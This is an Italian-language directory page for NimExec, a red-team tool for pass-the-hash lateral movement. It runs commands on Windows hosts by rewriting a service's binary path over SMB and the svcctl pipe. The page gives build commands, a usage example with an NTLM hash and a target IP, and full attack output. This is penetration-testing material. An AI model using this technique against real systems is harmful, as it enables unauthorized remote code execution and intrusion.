Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/frkngksl/nimexec
ExploitMovimento LateralePenetration TestingCommand and ControlRed Teaming
GitHubfrkngksl/nimexec

NimExec

Esecuzione di comandi senza file per movimento laterale in Nim

Vedi Repository
394404 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

NimExec

In pratica, NimExec è uno strumento di esecuzione di comandi remoti senza file che utilizza il protocollo remoto di Service Control Manager (MS-SCMR). Modifica il percorso binario di un servizio random o specificato eseguito da LocalSystem per eseguire il comando fornito sul target e lo ripristina successivamente tramite pacchetti RPC creati manualmente anziché chiamate WinAPI. Invia questi pacchetti su SMB2 e la named pipe svcctl.

NimExec necessita di un hash NTLM per autenticarsi alla macchina target e completa questo processo di autenticazione con il metodo di autenticazione NTLM tramite pacchetti creati manualmente.

Poiché tutti i pacchetti di rete necessari sono creati manualmente e non vengono utilizzate funzioni specifiche del sistema operativo, NimExec può essere utilizzato su diversi sistemi operativi grazie al supporto di cross-compilazione di Nim.

Questo progetto è stato ispirato dallo strumento SharpNoPSExec di Julio. Puoi considerare NimExec come una versione cross-compilabile e con supporto nativo di Pass the Hash di SharpNoPSExec. Inoltre, ho appreso le strutture dei pacchetti di rete necessari dallo script Invoke-SMBExec di Kevin Robertson.

Compilation

root@kitploit:~
nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim

Il comando precedente utilizza un Garbage Collector diverso perché il garbage collector predefinito in Nim genera alcuni errori SIGSEGV durante il processo di ricerca dei servizi.

Inoltre, puoi installare i moduli Nim necessari tramite Nimble con il seguente comando:

root@kitploit:~
nimble install ptr_math nimcrypto hostname

Usage

root@kitploit:~
test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v
 
                                                                                             _..._     
                                                                                          .-'_..._''.  
   _..._   .--. __  __   ___         __.....__                          __.....__       .' .'      '.\ 
 .'     '. |__||  |/  `.'   `.   .-''         '.                    .-''         '.    / .'            
.   .-.   ..--.|   .-.  .-.   ' /     .-''"'-.  `.                 /     .-''"'-.  `. . '              
|  '   '  ||  ||  |  |  |  |  |/     /________\   \ ____     _____/     /________\   \| |              
|  |   |  ||  ||  |  |  |  |  ||                  |`.   \  .'    /|                  || |              
|  |   |  ||  ||  |  |  |  |  |\    .-------------'  `.  `'    .' \    .-------------'. '              
|  |   |  ||  ||  |  |  |  |  | \    '-.____...---.    '.    .'    \    '-.____...---. \ '.          . 
|  |   |  ||__||__|  |__|  |__|  `.             .'     .'     `.    `.             .'   '. `._____.-'/ 
|  |   |  |                        `''-...... -'     .'  .'`.   `.    `''-...... -'       `-.______ /  
|  |   |  |                                        .'   /    `.   `.                               `   
'--'   '--'                                       '----'       '----'                                  

                                            @R0h1rr1m          


[+] Connected to 10.200.2.2:445
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!

È stato testato su Windows 10 e 11, Windows Server 2016, 2019 e 2022 da macchine Ubuntu 20.04 e Windows 10.

Command Line Parameters

root@kitploit:~
    -v | --verbose                          Enable more verbose output.
    -u | --username <Username>              Username for NTLM Authentication.*
    -h | --hash <NTLM Hash>                 NTLM password hash for NTLM Authentication.**
    -p | --password <Password>              Plaintext password.**
    -t | --target <Target>                  Lateral movement target.*
    -c | --command <Command>                Command to execute.*
    -d | --domain <Domain>                  Domain name for NTLM Authentication.
    -s | --service <Service Name>           Name of the service instead of a random one.
    --help                                  Show the help message.

References

  • https://github.com/juliourena/SharpNoPSExec
  • https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1
  • https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SCMR/%5bMS-SCMR%5d.pdf
  • https://github.com/jborean93/pypsexec/tree/master
  • https://www.x86matthew.com/view_post?id=create_svc_rpc

Disclaimer

Solo per test di sicurezza autorizzati. L'uso improprio di questo strumento contro sistemi senza esplicita autorizzazione è illegale.

Scarica lo strumento